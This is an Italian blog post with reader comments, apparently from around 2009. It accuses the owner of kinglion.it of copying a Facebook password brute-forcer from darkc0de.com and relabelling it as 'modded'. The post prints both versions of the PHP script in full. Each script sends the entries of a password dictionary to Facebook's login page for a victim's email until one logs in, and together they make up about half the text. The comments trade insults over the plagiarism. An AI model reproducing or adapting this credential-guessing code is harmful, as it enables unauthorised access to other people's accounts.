kinglion.it che spasso

Dopo lo scandalo di EuroHackers.it ecco che ne esce un altro.

Si tratta del nuovo blog “informatico” di KinG-LioN il cui indirizzo web è: http://www.kinglion.it

Come noterete a primo impatto ad ogni post c’è questa simpatica frase:

Questo articolo è stato scritto da Pasquale Venditto di kinglion.it. Ne è vietata la riproduzione anche parziale del contenuto.

Quindi si presuppone che ogni articolo scritto sia di sua proprietà ed ogni codice sorgente sia suo o sbaglio? No non credo di sbagliarmi e quindi vi faccio vedere subito cosa ci combina il nostro re leone.

http://www.kinglion.it/scoprire-e-trovare-password-di-facebook.html/

Questo post ci spiega in quattro e quattr’otto come utilizzare un brute forcer per il famoso social network Facebook, e purtroppo KinG ci mostra come ci si fare… Si a rippare -.-”

Ecco il codice sorgente del bruter “suo”:

################################
# Scoprire password di facebook
# Autore ignoto
# modded: by KinG-LioN http://www.kinglion.it
################################
set_time_limit(0);
$username =”kinglion@kinglion.it”; // Email vittima
$dictionary =”dizionario.txt”; // Dizionario

function kontrol($kullaniciadi,$sifre){
$useragent = “Opera/9.21 (Windows NT 5.1; U; tr)”;
$data = “email=$kullaniciadi&pass=$sifre&login=Login” ;
$ch = curl_init(‘[url]https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php’[/url]);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, ‘cookie.txt’);
curl_setopt($ch, CURLOPT_COOKIEJAR, ‘cookie.txt’);
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi(“Home”,$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo “$dictionary is not file”;exit;}
$lines=file($dictionary);
echo “Attack Starting..
“;
sleep(10);
echo “Attacco iniziato, attendi qualche minuto..
“;
foreach($lines as $line){
$line=str_replace(“\r”,””,$line);
$line=str_replace(“\n”,””,$line);
if(kontrol($username,$line)){echo “[+] username:$username , password:$line – P
assword found : $line

“;$fp=fopen(‘cookie.txt’,’w’);fwrite($fp,”);exit;}
else{echo “[-] username:$username , password:$line – Password non trovata :
$line

“;}
}
?>

Ed ecco quello aytach scritto in dicembre 2008 su darkc0de.com: http://darkc0de.com/c0de/php/face_book_brute_forcer.txt

################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username =”brute@force.org”; // username to brute force
$dictionary =”dictionary.txt”; // need dictionary to password list

function kontrol($kullaniciadi,$sifre){
$useragent = “Opera/9.21 (Windows NT 5.1; U; tr)”;
$data = “email=$kullaniciadi&pass=$sifre&login=Login” ;
$ch = curl_init(‘https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php’);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, ‘cookie.txt’);
curl_setopt($ch, CURLOPT_COOKIEJAR, ‘cookie.txt’);
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi(“Home”,$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo “$dictionary is not file”;exit;}
$lines=file($dictionary);
echo “Attack Starting..
“;
sleep(10);
echo “Attack Started, brute forcing..
“;
foreach($lines as $line){
$line=str_replace(“\r”,””,$line);
$line=str_replace(“\n”,””,$line);
if(kontrol($username,$line)){echo “[+] username:$username , password:$line – P
assword found : $line

“;$fp=fopen(‘cookie.txt’,’w’);fwrite($fp,”);exit;}
else{echo “[-] username:$username , password:$line – Password not found :
$line

“;}
}
?>

A primo impatto la differenza che vedo sta nell’autore e nel cambio di lingua da italiano a inglese… Ed ecco una citazione presa da RBT-4:

s3rg3770:
La vergogna la conosci? Vieti la RIPRODUZIONE DEL CODICE DI ALTRI? ahauahauah
SEI UNO SPETTACOLO DELLA NATURA !!

KinG-LioN:
hai rotto le palle, ora anke su kinglion.it vieni a fa il coglione? ma nn hai nulla d meglio da fare?
La vergogna e tua nn certo mia, leggi bene l’intestazione del codice ( AUTORE IGNOTO ) non ho detto ke il codice e mio!

Ma non facevi prima a scrivere il vero autore invece di mettere ignoto e modded by KinG-LioN pff -.-

E comunque il bug è fixato anche perché dopo alcuni tentativi Facebook blocca il login comunque ecco la divertente spiegazione di kingo per questo problema:

Se da qualche errore è probabile che devi cambiare e riscrivere a mano tutti gli “ e gli ‘ dello script xke wordpress usa una codifica diversa

Si va bene ciao. Hacking is dead… R.I.P.

Thanks to: RBT-4 Network

8 risposte a “kinglion.it che spasso

  1. non prendo le parti di nessuno ne le difese di nessuno, ma non e mai stato scritto ke il sorgente fosse suo, ed e stato chiaramento specificato che l’autore e ignoto e che quindi il sorgente non e suo, due il prolema deli apici si riferiva unicamente ad errori di esecuzione dello script non al fatto che il captcha blocca il bruteforce.
    Secondo me il vero buffone e l’autore di questo squallido blog

  2. mmh non dico niente ma l’articolo è stato fatto con un sorce code dove era esplicitamente scritta la fonte e lui ha pensato bene di scrivere ingoto e modded by me

    secondo me il vero buffone è l’autore di quel blog😉

  3. in chat è king_coglion ed è l’unico appellativo che gli si può dare.
    Un buffone e nient’altro peggio di aranzulla asd
    n3ss`

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...